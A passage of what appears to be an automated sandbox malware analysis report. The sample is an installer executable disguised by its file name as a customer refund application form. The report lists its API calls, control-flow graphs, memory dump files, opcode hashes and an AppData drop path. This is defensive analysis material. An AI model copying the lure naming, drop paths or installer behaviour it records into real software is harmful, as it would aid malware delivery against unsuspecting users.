                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C48
                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                        • Part of subcall function 004057F1: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets,?,00000000,000000F0), ref: 0040164D
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets, xrefs: 00401640
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets
                                                                                                                                      • API String ID: 1892508949-242930795
                                                                                                                                      • Opcode ID: 8b332d4b5b69e44390726f1312c4fe6c92a9be31ccf189f14f32e7c9e624f66a
                                                                                                                                      • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                      • Opcode Fuzzy Hash: 8b332d4b5b69e44390726f1312c4fe6c92a9be31ccf189f14f32e7c9e624f66a
                                                                                                                                      • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                                                                                      Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 692 4058a3-4058d4 CreateProcessW 693 4058e2-4058e3 692->693 694 4058d6-4058df CloseHandle 692->694 694->693
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                      Strings
                                                                                                                                      • Error launching installer, xrefs: 004058B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                      • String ID: Error launching installer
                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                      • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                      • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                      • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                      • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                      Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 695 4023e4-402415 call 402c41 * 2 call 402cd1 702 402ac5-402ad4 695->702 703 40241b-402425 695->703 704 402427-402434 call 402c41 lstrlenW 703->704 705 402438-40243b 703->705 704->705 708 40243d-40244e call 402c1f 705->708 709 40244f-402452 705->709 708->709 712 402463-402477 RegSetValueExW 709->712 713 402454-40245e call 403116 709->713 717 402479 712->717 718 40247c-40255d RegCloseKey 712->718 713->712 717->718 718->702
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(0040B5D0,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D0,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,00000011,00000002), ref: 00402557
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2655323295-0
                                                                                                                                      • Opcode ID: c55b81cacde53bb252ba38d1437cd19149d3d8cf8ee15f970659e81b0538e4d2
                                                                                                                                      • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                      • Opcode Fuzzy Hash: c55b81cacde53bb252ba38d1437cd19149d3d8cf8ee15f970659e81b0538e4d2
                                                                                                                                      • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                      Function 00401F8C Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 720 401f8c-401fb8 call 402c41 call 406694 GetFileVersionInfoSizeW 725 402ac5-402ad4 720->725 726 401fbe-401fcc GlobalAlloc 720->726 726->725 727 401fd2-401ff3 call 406694 * 2 726->727 735 401ff5-40200a 727->735 736 402029 727->736 735->736 738 40200c-402026 call 406201 * 2 735->738 736->725 738->736
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2520467145-0
                                                                                                                                      • Opcode ID: 649b0a593b3fe63d00a3e02f2c582d371805110ab8530cf08c457fc24fda2a94
                                                                                                                                      • Instruction ID: b0d1b6abe4fc6be066fa5f6dc65e71afea131539b75843f3c1332c7f073be64a
                                                                                                                                      • Opcode Fuzzy Hash: 649b0a593b3fe63d00a3e02f2c582d371805110ab8530cf08c457fc24fda2a94
                                                                                                                                      • Instruction Fuzzy Hash: F0114771A00208BEDB01AFE5D889E9EBBB4EF44304F15402AF905F62A0DB759950DB28
                                                                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                      • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                      • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                      • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                      Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ShowWindow.USER32(00010410,?), ref: 00401587
                                                                                                                                      • ShowWindow.USER32(0001040A), ref: 0040159C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ShowWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                      • Opcode ID: b740d30bdf824ff779bdd91d1af0f74546389116768f8a12bdecc3474dec47f3
                                                                                                                                      • Instruction ID: f806313cc2b23e457bf0aacbdd07ca6dd900f465a881214a0c79a18979c994cc
                                                                                                                                      • Opcode Fuzzy Hash: b740d30bdf824ff779bdd91d1af0f74546389116768f8a12bdecc3474dec47f3
                                                                                                                                      • Instruction Fuzzy Hash: 67E08637B141049BCB15CFA4ED808AE77A6EB88321324047FE502B3290CA75BD40CF38
                                                                                                                                      Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                        • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                        • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                        • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                      • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                      • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                      • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                      • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                      Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                      Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                      • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                      • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                      Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                      • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                      • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                      Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
